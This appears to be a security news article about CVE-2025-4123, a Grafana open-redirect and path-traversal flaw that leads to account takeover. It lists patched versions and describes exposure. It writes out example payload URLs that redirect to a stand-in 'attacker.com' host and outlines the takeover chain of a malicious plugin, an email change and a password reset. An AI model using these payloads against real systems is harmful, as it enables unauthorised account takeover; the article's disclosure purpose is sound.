A critical vulnerability affecting over 46,000 publicly accessible Grafana instances worldwide, with 36% of all public-facing deployments vulnerable to complete account takeover attacks.
The newly discovered flaw, designated CVE-2025-4123 and dubbed “The Grafana Ghost,” represents a significant threat to organizations relying on the popular open-source analytics and visualization platform for monitoring critical infrastructure.
Grafana Account Takeover (CVE-2025-4123)
CVE-2025-4123 operates as a sophisticated chain of exploits that begins with a seemingly innocent malicious link sent to victims.
.png
)
When clicked, the crafted URL forces Grafana to load an external malicious plugin hosted on an attacker’s server, enabling arbitrary code execution within the victim’s browser session.
The vulnerability specifically targets Grafana’s plugin loading mechanism at the /a/plugin-app/explore endpoint, where attackers can inject malicious JavaScript modules.
The attack leverages a fundamental flaw in Grafana’s static file handling system, specifically within the pkg/api/static/static.go source code.
OX Security researchers reported that the ctx.Req.URL.Path parameter can be manipulated to achieve an open redirect, allowing attackers to redirect users to external malicious sites while maintaining the appearance of legitimate Grafana functionality.
Once the malicious plugin executes, it can modify the victim’s account email address using only the grafana_session token, after which attackers can initiate password reset procedures to complete the account takeover.
Technical analysis reveals that the flaw exploits path normalization weaknesses through a carefully crafted payload: http://localhost:3000/public/../attacker.com/%3f/../…
This string leverages the path.Clean function, where /public/../ resolves to the root directory, while subsequent path traversal sequences enable redirection to attacker-controlled domains.
The payload structure /attacker.com creates a protocol-relative URL that inherits the current page’s protocol, effectively bypassing browser security restrictions.
Modern browsers typically normalize such malicious paths, but Grafana’s client-side JavaScript routing logic provides an alternative attack vector.
By using encoded path traversal sequences like /public/..%2f..%2f..%2f..%2fsomething, attackers can bypass browser normalization and trigger the vulnerability through JavaScript execution.
This sophisticated technique demonstrates how multiple security layers can be circumvented through creative exploitation methods.
The attack’s effectiveness extends beyond public-facing instances, as internal Grafana deployments remain equally vulnerable.
Attackers can craft payloads targeting locally used domain names and ports, making even air-gapped or network-segmented Grafana installations susceptible to blind attacks.
Immediate Patching Required
Organizations must immediately upgrade to patched Grafana versions to mitigate this critical vulnerability.
Available security patches include versions 10.4.18+security-01, 11.2.9+security-01, 11.3.6+security-01, 11.4.4+security-01, 11.5.4+security-01, 11.6.1+security-01, and 12.0.0+security-01.
The vulnerability affects a substantial portion of the estimated 128,000 Grafana instances identified through Shodan searches.
A compromised Grafana administrator account provides attackers with complete access to internal metrics, dashboards, sensitive operational data, and business intelligence systems.
Additionally, attackers can lock out legitimate users, delete accounts, and cause significant operational disruption by removing access to critical monitoring infrastructure.
Given Grafana’s widespread adoption in DevOps environments, this vulnerability poses substantial risks to organizational security and operational continuity, making immediate remediation essential for all affected deployments.
Will the Password Manager Close the Security Gap Hackers Exploit => Check How
